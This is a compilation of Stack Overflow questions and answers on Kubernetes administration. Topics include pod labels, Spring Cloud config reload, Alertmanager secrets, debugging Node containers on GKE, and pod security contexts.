| <p>Posting this in case others find it useful. If you want to access other K8S resources, you would need to use the standard <code>clientSet</code> object from Kubernetes' client-go. For e.g. if you want to confirm that a specific namespace called <code>targetNamespace</code> exists:</p>
<pre><code>mgr, _ := manager.New(cfg, manager.Options{})
generatedClient := kubernetes.NewForConfigOrDie(mgr.GetConfig())
nsFound := false
namespaces := generatedClient.CoreV1().Namespaces()
namespaceList, _ := namespaces.List(metav1.ListOptions{})
for _, ns := range namespaceList.Items {
if ns.Name == targetNamespace {
nsFound = true
break
}
}
g.Expect(nsFound).To(gomega.BeTrue())
log.Printf("Namespace %s verified", targetNamespace)
</code></pre>
|
<p>I was working on Jenkins for many days and deploy my services to Kubernetes.</p>
<p>I recently came across Jenkins X, I also found a Helm chart for Jenkins through which I can host Jenkins in Kubernetes. Now I'm confused if they both are same?</p>
| <p>No they are different. I assume the helm chart you found installs and configure Jenkins on Kubernetes - perhaps configured with some agents to run builds. </p>
<p>Jenkins X is a kubernetes native implementation of CI/CD, it uses some components of Jenkins, but has a lot more to it (for example, applications, environments, review apps, deployments and so on) for running apps ON kubernetes in a CI/CD fashion. The Jenkins helm chart likely sets up a single server. </p>
<p>edit: in the time since, Jenkins X has evolved a lot. It is now build using he Tekton engine for pipeline by default, and has many moving parts, so is quite different from running a more classic like Jenkins master/agent setup in a Kubernetes cluster. </p>
|
<p>my question is:</p>
<p>How do I reserve Azure Kubernetes Service (AKS) VMs?</p>
<p><a href="https://azure.microsoft.com/en-us/pricing/calculator/" rel="nofollow noreferrer">https://azure.microsoft.com/en-us/pricing/calculator/</a> </p>
<p>In the pricing calculator show that I can Reserve VMs for 3 years, that exists when buying VMs, but have no when buying AKS</p>
<p>What is the flow?</p>
<p>I should reserve as VM then call support and transfer them from ASK flow?</p>
<p>I am asking here this question because Microsoft has link Stackoverflow is "community" forum</p>
<p><a href="https://azure.microsoft.com/en-us/support/community/" rel="nofollow noreferrer">https://azure.microsoft.com/en-us/support/community/</a></p>
<p><a href="https://i.stack.imgur.com/Oeosm.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/Oeosm.png" alt="enter image description here"></a></p>
| <p><a href="https://learn.microsoft.com/en-us/azure/virtual-machines/windows/prepay-reserved-vm-instances?toc=/azure/billing/TOC.json#next-steps" rel="nofollow noreferrer">https://learn.microsoft.com/en-us/azure/virtual-machines/windows/prepay-reserved-vm-instances?toc=/azure/billing/TOC.json#next-steps</a></p>
<p>After you buy reservations they are applied automatically to the VMs you are buying: The reservation discount is applied automatically to the number of running virtual machines that match the reservation scope and attributes.</p>
<p>So you just have to buy adequate reservations that are scoped properly</p>
|
<p>I've created a label with:</p>
<p><code>kubectl label pods <pod id> color=green</code></p>
<p>but removing it using:</p>
<p><code>kubectl label pods bar -color</code></p>
<p>gives:</p>
<p><code>unknown shorthand flag: 'c' in -color</code></p>
<p>Any suggestions?</p>
| <p>The dash goes at the end of the label name to remove it, per <code>kubectl help label</code>:</p>
<pre><code># Update pod 'foo' by removing a label named 'bar' if it exists.
# Does not require the --overwrite flag.
kubectl label pods foo bar-
</code></pre>
<p>So try <code>kubectl label pods bar color-</code>.</p>
|
<p>I have a process where I use a Kubernetes client to build a deployment and a service. This process works fine but I have to wait some time for google to assign it an external IP. I cant seem to find anything in googles docs about a possible event emitter for when this process is done. Is there a way to programmatically pass or configure a request that can be made to a REST api that could go out and retrieve the info once it its ready?</p>
| <p>Yes. I assume that you mean to assign a <a href="https://kubernetes.io/docs/concepts/services-networking/#loadbalancer" rel="nofollow noreferrer">LoadBalancer</a> type of address to your Kubernetes <a href="https://kubernetes.io/docs/concepts/services-networking/service/" rel="nofollow noreferrer">service</a>. You can manually query the GCP API to see if your Load Balancer IP has been allocated. For example, <a href="https://cloud.google.com/compute/docs/reference/rest/v1/addresses/get" rel="nofollow noreferrer">GET</a> a resource address.</p>
<p>You can also use the <a href="https://cloud.google.com/sdk/gcloud/reference/compute/addresses/" rel="nofollow noreferrer">gcloud</a> command.</p>
<p><a href="https://cloud.google.com/load-balancing/docs/apis" rel="nofollow noreferrer">Here is</a> a list of all the GCP APIs related to load balancing that you can use.</p>
|
<p>I am trying to deploy Hyperledger fabric 1.0.5 on k8s, and use the balance transfer to test it. Everything is right before instantiate-chaincode, and I get this:</p>
<pre><code>[2019-01-02 23:23:14.392] [ERROR] instantiate-chaincode - Failed to send instantiate transaction and get notifications within the timeout period. undefined
[2019-01-02 23:23:14.393] [ERROR] instantiate-chaincode - Failed to order the transaction. Error code: undefined
</code></pre>
<p>and I use <code>kubectl logs</code> to get the peer0's log which is like this:</p>
<pre><code>[ConnProducer] NewConnection -> ERRO 61a Failed connecting to orderer2.orderer1:7050 , error: context deadline exceeded
[ConnProducer] NewConnection -> ERRO 61b Failed connecting to orderer1.orderer1:7050 , error: context deadline exceeded
[ConnProducer] NewConnection -> ERRO 61c Failed connecting to orderer0.orderer1:7050 , error: context deadline exceeded
[deliveryClient] connect -> DEBU 61d Connected to
[deliveryClient] connect -> ERRO 61e Failed obtaining connection: Could not connect to any of the endpoints: [orderer2.orderer1:7050 orderer1.orderer1:7050 orderer0.orderer1:7050]
</code></pre>
<p>I checked the connectivity of <code>orderer0:7050</code> and found no problem.</p>
<p>What should I do next?</p>
<p>Thank for help!</p>
| <p>You didn't describe what runbook you followed to deploy Hyperledger Fabric but looks like your pods cannot find each other <a href="https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/" rel="nofollow noreferrer">through DNS</a>. If you are following Kubernetes standards your pods should be in the <code>orderer1</code> namespace and hopefully, you have Kubernetes <a href="https://kubernetes.io/docs/concepts/services-networking/service/" rel="nofollow noreferrer">services</a> for <code>orderer0</code>, <code>orderer1</code>, and <code>orderer2</code>.</p>
<p>You can read more about communication between the Fabric components <a href="http://www.think-foundry.com/deploy-hyperledger-fabric-on-kubernetes-part-1/" rel="nofollow noreferrer">here</a> in the "Communication between Fabric components" section. Also, read on the "Work around the chaincode sandbox" where it shows you a workaround for <code>--dns-search</code>.</p>
|
<p>I have configured Prometheus & Grafana in GCP kubernetes Environment using the KB's provided in <a href="https://github.com/coreos/prometheus-operator/tree/master/contrib/kube-prometheus/manifests" rel="nofollow noreferrer">https://github.com/coreos/prometheus-operator/tree/master/contrib/kube-prometheus/manifests</a> </p>
<p>All are working perfect and my cluster details are showing in Grafana. Now I want to configure alert for Prometheus and need to integrate to my slack channel. If anyone have any Idea about this please let me know.</p>
<p>Thanks in advance</p>
| <p>Using the prometheus-operator, it took me a while to figure out that the alertmanager configuration is stored as a secret in
<a href="https://github.com/coreos/prometheus-operator/blob/master/contrib/kube-prometheus/manifests/alertmanager-secret.yaml" rel="nofollow noreferrer">https://github.com/coreos/prometheus-operator/blob/master/contrib/kube-prometheus/manifests/alertmanager-secret.yaml</a></p>
<p>You would need to decode it, edit, encode and apply</p>
<pre><code>echo "Imdsb2JhbCI6IAogICJyZXNvbHZlX3RpbWVvdXQiOiAiNW0iCiJyZWNlaXZlcnMiOiAKLSAibmFtZSI6ICJudWxsIgoicm91dGUiOiAKICAiZ3JvdXBfYnkiOiAKICAtICJqb2IiCiAgImdyb3VwX2ludGVydmFsIjogIjVtIgogICJncm91cF93YWl0IjogIjMwcyIKICAicmVjZWl2ZXIiOiAibnVsbCIKICAicmVwZWF0X2ludGVydmFsIjogIjEyaCIKICAicm91dGVzIjogCiAgLSAibWF0Y2giOiAKICAgICAgImFsZXJ0bmFtZSI6ICJEZWFkTWFuc1N3aXRjaCIKICAgICJyZWNlaXZlciI6ICJudWxsIg==" | base64 --decode
</code></pre>
|
<p>I have this demo project which prints a label that is read from the configurations.</p>
<p>This is my main class:</p>
<pre><code>@SpringBootApplication
@EnableDiscoveryClient
@RestController
public class DemoApplication {
private MyConfig config;
private DiscoveryClient discoveryClient;
@Autowired
public DemoApplication(MyConfig config, DiscoveryClient discoveryClient) {
this.config = config;
this.discoveryClient = discoveryClient;
}
@RequestMapping("/")
public String info() {
return config.getMessage();
}
public static void main(String[] args) {
SpringApplication.run(DemoApplication.class, args);
}
@RequestMapping("/services")
public String services() {
StringBuilder b = new StringBuilder();
discoveryClient.getServices().forEach((s) -> b.append(s).append(" , "));
return b.toString();
}
}
</code></pre>
<p>And the <code>MyConfig</code> class is:</p>
<pre><code>@Configuration
@ConfigurationProperties(prefix = "bean")
public class MyConfig {
private String message = "a message that can be changed live";
public String getMessage() {
return message;
}
public void setMessage(String message) {
this.message = message;
}
}
</code></pre>
<p>The <code>bootstrap.properties</code> contain:</p>
<pre><code>spring.application.name=demo
spring.cloud.kubernetes.config.name=demo
spring.cloud.kubernetes.config.enabled=true
spring.cloud.kubernetes.config.namespace=default
spring.cloud.kubernetes.reload.enabled=true
spring.cloud.kubernetes.reload.monitoring-config-maps=true
spring.cloud.kubernetes.reload.strategy=refresh
spring.cloud.kubernetes.reload.mode=event
management.endpoint.refresh.enabled=true
management.endpoints.web.exposure.include=*
</code></pre>
<p>And the dependencies in <code>build.gradle</code>:</p>
<pre><code>dependencies {
compile("org.springframework.boot:spring-boot-starter-web")
compile("org.springframework.boot:spring-boot-starter-actuator")
compile("org.springframework.cloud:spring-cloud-starter-kubernetes:+")
compile("org.springframework.cloud:spring-cloud-starter-kubernetes-config:+")
testCompile('org.springframework.boot:spring-boot-starter-test')
runtime("org.springframework.boot:spring-boot-properties-migrator")
}
</code></pre>
<p>I'm creating the ConfigMap with <code>kubectl create -f configmap-demo.yml</code> being the content:</p>
<pre><code>apiVersion: v1
kind: ConfigMap
metadata:
name: demo
data:
bean.message: This is an info from k8
</code></pre>
<p>When deploying in Kubernetes I get the following error on Spring Boot startup:</p>
<pre><code>2019-01-02 13:41:41.462 INFO 1 --- [ main] trationDelegate$BeanPostProcessorChecker : Bean 'configurationPropertiesRebinderAutoConfiguration' of type [org.springframework.cloud.autoconfigure.ConfigurationPropertiesRebinderAutoConfiguration$$EnhancerBySpringCGLIB$$e13002af] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying)
. ____ _ __ _ _
/\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
\\/ ___)| |_)| | | | | || (_| | ) ) ) )
' |____| .__|_| |_|_| |_\__, | / / / /
=========|_|==============|___/=/_/_/_/
:: Spring Boot :: (v2.1.1.RELEASE)
2019-01-02 13:41:41.940 INFO 1 --- [ main] b.c.PropertySourceBootstrapConfiguration : Located property source: ConfigMapPropertySource {name='configmap.demo.default'}
2019-01-02 13:41:41.942 INFO 1 --- [ main] b.c.PropertySourceBootstrapConfiguration : Located property source: SecretsPropertySource {name='secrets.demo.default'}
2019-01-02 13:41:42.030 INFO 1 --- [ main] com.example.demo.DemoApplication : The following profiles are active: kubernetes
2019-01-02 13:41:43.391 INFO 1 --- [ main] o.s.cloud.context.scope.GenericScope : BeanFactory id=416ee750-8ebb-365d-9114-12b51acaa1e0
2019-01-02 13:41:43.490 INFO 1 --- [ main] trationDelegate$BeanPostProcessorChecker : Bean 'org.springframework.cloud.autoconfigure.ConfigurationPropertiesRebinderAutoConfiguration' of type [org.springframework.cloud.autoconfigure.ConfigurationPropertiesRebinderAutoConfiguration$$EnhancerBySpringCGLIB$$e13002af] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying)
2019-01-02 13:41:43.917 INFO 1 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat initialized with port(s): 8080 (http)
2019-01-02 13:41:43.952 INFO 1 --- [ main] o.apache.catalina.core.StandardService : Starting service [Tomcat]
2019-01-02 13:41:43.953 INFO 1 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet Engine: Apache Tomcat/9.0.13
2019-01-02 13:41:43.969 INFO 1 --- [ main] o.a.catalina.core.AprLifecycleListener : The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: [/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjdk/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib]
2019-01-02 13:41:44.156 INFO 1 --- [ main] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring embedded WebApplicationContext
2019-01-02 13:41:44.157 INFO 1 --- [ main] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 2033 ms
2019-01-02 13:41:44.957 INFO 1 --- [ main] o.s.s.concurrent.ThreadPoolTaskExecutor : Initializing ExecutorService 'applicationTaskExecutor'
2019-01-02 13:41:45.353 WARN 1 --- [ main] ConfigServletWebServerApplicationContext : Exception encountered during context initialization - cancelling refresh attempt: org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'propertyChangeWatcher' defined in class path resource [org/springframework/cloud/kubernetes/config/reload/ConfigReloadAutoConfiguration$ConfigReloadAutoConfigurationBeans.class]: Unsatisfied dependency expressed through method 'propertyChangeWatcher' parameter 1; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'configurationUpdateStrategy' defined in class path resource [org/springframework/cloud/kubernetes/config/reload/ConfigReloadAutoConfiguration$ConfigReloadAutoConfigurationBeans.class]: Unsatisfied dependency expressed through method 'configurationUpdateStrategy' parameter 2; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No qualifying bean of type 'org.springframework.cloud.context.restart.RestartEndpoint' available: expected at least 1 bean which qualifies as autowire candidate. Dependency annotations: {}
2019-01-02 13:41:45.358 INFO 1 --- [ main] o.s.s.concurrent.ThreadPoolTaskExecutor : Shutting down ExecutorService 'applicationTaskExecutor'
2019-01-02 13:41:45.370 INFO 1 --- [ main] o.apache.catalina.core.StandardService : Stopping service [Tomcat]
2019-01-02 13:41:45.398 INFO 1 --- [ main] ConditionEvaluationReportLoggingListener :
Error starting ApplicationContext. To display the conditions report re-run your application with 'debug' enabled.
2019-01-02 13:41:45.612 ERROR 1 --- [ main] o.s.b.d.LoggingFailureAnalysisReporter :
***************************
APPLICATION FAILED TO START
***************************
Description:
Parameter 2 of method configurationUpdateStrategy in org.springframework.cloud.kubernetes.config.reload.ConfigReloadAutoConfiguration$ConfigReloadAutoConfigurationBeans required a bean of type 'org.springframework.cloud.context.restart.RestartEndpoint' that could not be found.
The following candidates were found but could not be injected:
- Bean method 'restartEndpoint' in 'RestartEndpointWithIntegrationConfiguration' not loaded because @ConditionalOnClass did not find required class 'org.springframework.integration.monitor.IntegrationMBeanExporter'
- Bean method 'restartEndpointWithoutIntegration' in 'RestartEndpointWithoutIntegrationConfiguration' not loaded because @ConditionalOnEnabledEndpoint no property management.endpoint.restart.enabled found so using endpoint default
Action:
Consider revisiting the entries above or defining a bean of type 'org.springframework.cloud.context.restart.RestartEndpoint' in your configuration.
</code></pre>
<p>If I set <code>spring.cloud.kubernetes.reload.enabled</code> to <code>false</code> everything works and the configmap is read and put to use. Now my goal is to reload the configuration if the configmap changes but get the exception seen above. I can invoke <code>/actuator/refresh</code> manually so I don't think it is the lack of the availability for the refresh endpoint.</p>
<p>I created a demo project with all included at <a href="https://drive.google.com/open?id=1QbP8vePALLZ2hWQJArnyxrzSySuXHKiz" rel="noreferrer">https://drive.google.com/open?id=1QbP8vePALLZ2hWQJArnyxrzSySuXHKiz</a> .</p>
| <p>It starts if you set <code>management.endpoint.restart.enabled=true</code></p>
<p>The message tells you that it can't load a <code>RestartEndpoint</code> bean. None was created because there's two ways it could be loaded and nether was satisfied:</p>
<blockquote>
<ul>
<li>Bean method 'restartEndpoint' in 'RestartEndpointWithIntegrationConfiguration' not loaded because @ConditionalOnClass did not find required class 'org.springframework.integration.monitor.IntegrationMBeanExporter'</li>
</ul>
</blockquote>
<p>Well you're not using spring integration so I guess you don't want this path - you want the other one.</p>
<blockquote>
<ul>
<li>Bean method 'restartEndpointWithoutIntegration' in 'RestartEndpointWithoutIntegrationConfiguration' not loaded because @ConditionalOnEnabledEndpoint no property management.endpoint.restart.enabled found so using endpoint default</li>
</ul>
</blockquote>
<p>So <a href="https://stackoverflow.com/questions/49641443/springboot-upgrade-1-5-8-to-2-0-release-getting-exception-org-springframework-b">we need to set</a> <code>management.endpoint.restart.enabled=true</code>, which is also set in the <a href="https://github.com/spring-cloud/spring-cloud-kubernetes/blob/a30b2d85dc7ea04add4d54a24ad04e0e787a4e59/spring-cloud-kubernetes-examples/kubernetes-reload-example/src/main/resources/application.yaml#L4" rel="noreferrer">official reload example project</a>. Without setting this the RestartEndpoint bean that we require <a href="https://github.com/spring-cloud/spring-cloud-commons/blob/master/spring-cloud-context/src/main/java/org/springframework/cloud/autoconfigure/RefreshEndpointAutoConfiguration.java#L104" rel="noreferrer">will not be loaded</a>.</p>
|
<p>I am new to containers and using GKE. I used to run my node server app with <code>npm run debug</code> and am trying to do this as well on GKE using the shell of my container. When I log into the shell of <code>myapp</code> container and do this I get:</p>
<pre><code>> [email protected] start /usr/src/app
> node src/
events.js:167
throw er; // Unhandled 'error' event
^
Error: listen EADDRINUSE :::8089
</code></pre>
<p>Normally I deal with this using something like <a href="https://stackoverflow.com/questions/9898372/how-to-fix-error-listen-eaddrinuse-while-using-nodejs"><code>killall -9 node</code></a> but when I do this it looks like I am kicked out of my shell and the container is restarted by kubernetes. It seems node is using the port already or something:</p>
<pre><code>netstat -tulpn | grep 8089
tcp 0 0 :::8089 :::* LISTEN 23/node
</code></pre>
<p>How can I start my server from the shell?</p>
<p>My config files:
Dockerfile:</p>
<pre><code>FROM node:10-alpine
RUN apk add --update \
libc6-compat
WORKDIR /usr/src/app
COPY package*.json ./
COPY templates-mjml/ templates-mjml/
COPY public/ public/
COPY src/ src/
COPY data/ data/
COPY config/ config/
COPY migrations/ migrations/
ENV NODE_ENV 'development'
ENV PORT '8089'
RUN npm install --development
</code></pre>
<p>myapp.yaml:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: myapp
labels:
app: myapp
spec:
ports:
- port: 8089
name: http
selector:
app: myapp
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: myapp
labels:
app: myapp
spec:
selector:
matchLabels:
app: myapp
template:
metadata:
labels:
app: myapp
spec:
containers:
- name: myapp
image: gcr.io/myproject-224713/firstapp:v4
ports:
- containerPort: 8089
env:
- name: POSTGRES_DB_HOST
value: 127.0.0.1:5432
- name: POSTGRES_DB_USER
valueFrom:
secretKeyRef:
name: mysecret
key: username
- name: POSTGRES_DB_PASSWORD
valueFrom:
secretKeyRef:
name: mysecret
key: password
- name: cloudsql-proxy
image: gcr.io/cloudsql-docker/gce-proxy:1.11
command: ["/cloud_sql_proxy",
"-instances=myproject-224713:europe-west4:mydatabase=tcp:5432",
"-credential_file=/secrets/cloudsql/credentials.json"]
securityContext:
runAsUser: 2
allowPrivilegeEscalation: false
volumeMounts:
- name: cloudsql-instance-credentials
mountPath: /secrets/cloudsql
readOnly: true
volumes:
- name: cloudsql-instance-credentials
secret:
secretName: cloudsql-instance-credentials
---
</code></pre>
<p>myrouter.yaml:</p>
<pre><code>apiVersion: networking.istio.io/v1alpha3
kind: Gateway
metadata:
name: myapp-gateway
spec:
selector:
istio: ingressgateway
servers:
- port:
number: 80
name: http
protocol: HTTP
hosts:
- "*"
---
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
name: myapp
spec:
hosts:
- "*"
gateways:
- myapp-gateway
http:
- match:
- uri:
prefix: /
route:
- destination:
host: myapp
weight: 100
websocketUpgrade: true
</code></pre>
<p>EDIT:
I got following logs:<a href="https://i.stack.imgur.com/QqjtF.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/QqjtF.png" alt="enter image description here"></a></p>
<p>EDIT 2:
After adding a <a href="https://think-engineer.com/blog/cloud-computing/exposing-a-feathers-js-http-api-in-kubernetes-using-ingress" rel="nofollow noreferrer">featherjs health service</a> I get following output for <code>describe</code>:</p>
<pre><code>Name: myapp-95df4dcd6-lptnq
Namespace: default
Node: gke-standard-cluster-1-default-pool-59600833-pcj3/10.164.0.3
Start Time: Wed, 02 Jan 2019 22:08:33 +0100
Labels: app=myapp
pod-template-hash=518908782
Annotations: kubernetes.io/limit-ranger: LimitRanger plugin set: cpu request for container myapp; cpu request for container cloudsql-proxy
sidecar.istio.io/status:
{"version":"3c9617ff82c9962a58890e4fa987c69ca62487fda71c23f3a2aad1d7bb46c748","initContainers":["istio-init"],"containers":["istio-proxy"]...
Status: Running
IP: 10.44.3.17
Controlled By: ReplicaSet/myapp-95df4dcd6
Init Containers:
istio-init:
Container ID: docker://768b2327c6cfa57b3d25a7029e52ce6a88dec6848e91dd7edcdf9074c91ff270
Image: gcr.io/gke-release/istio/proxy_init:1.0.2-gke.0
Image ID: docker-pullable://gcr.io/gke-release/istio/proxy_init@sha256:e30d47d2f269347a973523d0c5d7540dbf7f87d24aca2737ebc09dbe5be53134
Port: <none>
Host Port: <none>
Args:
-p
15001
-u
1337
-m
REDIRECT
-i
*
-x
-b
8089,
-d
State: Terminated
Reason: Completed
Exit Code: 0
Started: Wed, 02 Jan 2019 22:08:34 +0100
Finished: Wed, 02 Jan 2019 22:08:35 +0100
Ready: True
Restart Count: 0
Environment: <none>
Mounts: <none>
Containers:
myapp:
Container ID: docker://5566a3e8242ec6755dc2f26872cfb024fab42d5f64aadc3db1258fcb834f8418
Image: gcr.io/myproject-224713/firstapp:v4
Image ID: docker-pullable://gcr.io/myproject-224713/firstapp@sha256:0cbd4fae0b32fa0da5a8e6eb56cb9b86767568d243d4e01b22d332d568717f41
Port: 8089/TCP
Host Port: 0/TCP
State: Running
Started: Wed, 02 Jan 2019 22:09:19 +0100
Last State: Terminated
Reason: Completed
Exit Code: 0
Started: Wed, 02 Jan 2019 22:08:35 +0100
Finished: Wed, 02 Jan 2019 22:09:19 +0100
Ready: False
Restart Count: 1
Requests:
cpu: 100m
Liveness: http-get http://:8089/health delay=15s timeout=20s period=10s #success=1 #failure=3
Readiness: http-get http://:8089/health delay=5s timeout=5s period=10s #success=1 #failure=3
Environment:
POSTGRES_DB_HOST: 127.0.0.1:5432
POSTGRES_DB_USER: <set to the key 'username' in secret 'mysecret'> Optional: false
POSTGRES_DB_PASSWORD: <set to the key 'password' in secret 'mysecret'> Optional: false
Mounts:
/var/run/secrets/kubernetes.io/serviceaccount from default-token-9vtz5 (ro)
cloudsql-proxy:
Container ID: docker://414799a0699abe38c9759f82a77e1a3e06123714576d6d57390eeb07611f9a63
Image: gcr.io/cloudsql-docker/gce-proxy:1.11
Image ID: docker-pullable://gcr.io/cloudsql-docker/gce-proxy@sha256:5c690349ad8041e8b21eaa63cb078cf13188568e0bfac3b5a914da3483079e2b
Port: <none>
Host Port: <none>
Command:
/cloud_sql_proxy
-instances=myproject-224713:europe-west4:osm=tcp:5432
-credential_file=/secrets/cloudsql/credentials.json
State: Running
Started: Wed, 02 Jan 2019 22:08:36 +0100
Ready: True
Restart Count: 0
Requests:
cpu: 100m
Environment: <none>
Mounts:
/secrets/cloudsql from cloudsql-instance-credentials (ro)
/var/run/secrets/kubernetes.io/serviceaccount from default-token-9vtz5 (ro)
istio-proxy:
Container ID: docker://898bc95c6f8bde18814ef01ce499820d545d7ea2d8bf494b0308f06ab419041e
Image: gcr.io/gke-release/istio/proxyv2:1.0.2-gke.0
Image ID: docker-pullable://gcr.io/gke-release/istio/proxyv2@sha256:826ef4469e4f1d4cabd0dc846f9b7de6507b54f5f0d0171430fcd3fb6f5132dc
Port: <none>
Host Port: <none>
Args:
proxy
sidecar
--configPath
/etc/istio/proxy
--binaryPath
/usr/local/bin/envoy
--serviceCluster
myapp
--drainDuration
45s
--parentShutdownDuration
1m0s
--discoveryAddress
istio-pilot.istio-system:15007
--discoveryRefreshDelay
1s
--zipkinAddress
zipkin.istio-system:9411
--connectTimeout
10s
--statsdUdpAddress
istio-statsd-prom-bridge.istio-system:9125
--proxyAdminPort
15000
--controlPlaneAuthPolicy
NONE
State: Running
Started: Wed, 02 Jan 2019 22:08:36 +0100
Ready: True
Restart Count: 0
Requests:
cpu: 10m
Environment:
POD_NAME: myapp-95df4dcd6-lptnq (v1:metadata.name)
POD_NAMESPACE: default (v1:metadata.namespace)
INSTANCE_IP: (v1:status.podIP)
ISTIO_META_POD_NAME: myapp-95df4dcd6-lptnq (v1:metadata.name)
ISTIO_META_INTERCEPTION_MODE: REDIRECT
Mounts:
/etc/certs/ from istio-certs (ro)
/etc/istio/proxy from istio-envoy (rw)
Conditions:
Type Status
Initialized True
Ready False
PodScheduled True
Volumes:
cloudsql-instance-credentials:
Type: Secret (a volume populated by a Secret)
SecretName: cloudsql-instance-credentials
Optional: false
default-token-9vtz5:
Type: Secret (a volume populated by a Secret)
SecretName: default-token-9vtz5
Optional: false
istio-envoy:
Type: EmptyDir (a temporary directory that shares a pod's lifetime)
Medium: Memory
istio-certs:
Type: Secret (a volume populated by a Secret)
SecretName: istio.default
Optional: true
QoS Class: Burstable
Node-Selectors: <none>
Tolerations: node.kubernetes.io/not-ready:NoExecute for 300s
node.kubernetes.io/unreachable:NoExecute for 300s
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Normal Scheduled 68s default-scheduler Successfully assigned myapp-95df4dcd6-lptnq to gke-standard-cluster-1-default-pool-59600833-pcj3
Normal SuccessfulMountVolume 68s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 MountVolume.SetUp succeeded for volume "istio-envoy"
Normal SuccessfulMountVolume 68s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 MountVolume.SetUp succeeded for volume "default-token-9vtz5"
Normal SuccessfulMountVolume 68s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 MountVolume.SetUp succeeded for volume "cloudsql-instance-credentials"
Normal SuccessfulMountVolume 68s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 MountVolume.SetUp succeeded for volume "istio-certs"
Normal Pulled 67s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Container image "gcr.io/gke-release/istio/proxy_init:1.0.2-gke.0" already present on machine
Normal Created 67s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Created container
Normal Started 67s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Started container
Normal Pulled 66s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Container image "gcr.io/cloudsql-docker/gce-proxy:1.11" already present on machine
Normal Created 66s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Created container
Normal Started 66s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Started container
Normal Created 65s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Created container
Normal Started 65s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Started container
Normal Pulled 65s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Container image "gcr.io/gke-release/istio/proxyv2:1.0.2-gke.0" already present on machine
Normal Created 65s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Created container
Normal Started 65s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Started container
Warning Unhealthy 31s (x4 over 61s) kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Readiness probe failed: HTTP probe failed with statuscode: 404
Normal Pulled 22s (x2 over 66s) kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Container image "gcr.io/myproject-224713/firstapp:v4" already present on machine
Warning Unhealthy 22s (x3 over 42s) kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Liveness probe failed: HTTP probe failed with statuscode: 404
Normal Killing 22s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Killing container with id docker://myapp:Container failed liveness probe.. Container will be killed and recreated.
</code></pre>
| <p>This is just how Kubernetes works, as long as your pod has processes running it will remain 'up'. The moment you kill one if its processes Kubernetes will restart the pod because it crashed or something went wrong.</p>
<p>If you really want to debug with <code>npm run debug</code> consider either:</p>
<ol>
<li><p>Create a container with the <a href="https://docs.docker.com/engine/reference/builder/#cmd" rel="nofollow noreferrer"><code>CMD</code></a> (at the end) or <a href="https://docs.docker.com/engine/reference/builder/#entrypoint" rel="nofollow noreferrer"><code>ENTRYPOINT</code></a> value in your Dockerfile that is <code>npm run debug</code>. Then run it using a Deployment definition in Kubernetes.</p></li>
<li><p>Override the command in the <code>myapp</code> container in your deployment definition with something like:</p>
<pre><code>spec:
containers:
- name: myapp
image: gcr.io/myproject-224713/firstapp:v4
ports:
- containerPort: 8089
command: ["npm", "run", "debug" ]
env:
- name: POSTGRES_DB_HOST
value: 127.0.0.1:5432
- name: POSTGRES_DB_USER
valueFrom:
secretKeyRef:
name: mysecret
key: username
- name: POSTGRES_DB_PASSWORD
valueFrom:
secretKeyRef:
name: mysecret
key: password
</code></pre></li>
</ol>
|
<p>I have multiple containers and want to run all the containers as a non-root user, I know adding securityContext will help me, but do I need to add securityContext in all the containers or adding it in specs level will help?</p>
<pre><code>spec:
template:
metadata: Test image
spec:
securityContext:
runAsUser: 1000
fsGroup: 1000
containers:
-name: container-1
securityContext:
allowPrivilegeEscalation: false
-name: container-2
securityContext:
allowPrivilegeEscalation: false
</code></pre>
<p>The question is, <code>runAsUser</code> is applicable to all the container i.e., all the containers (container-1, container-2) will run as user 1000 or I need to specify securityContext in all the container?</p>
| <blockquote>
<p>The question is, runAsUser is applicable to all the container i.e., all the containers (container-1, container-2) will run as user 1000 or I need to specify securityContext in all the container?</p>
</blockquote>
<p>Yes. It's applicable to all the containers, so you only need to add it to the pod spec if you want to have it in all the containers of that particular pod. As per the <a href="https://kubernetes.io/docs/tasks/configure-pod-container/security-context/#set-the-security-context-for-a-pod" rel="noreferrer">docs</a>:</p>
<blockquote>
<p>The security settings that you specify for a Pod apply to all Containers in the Pod. </p>
</blockquote>
|
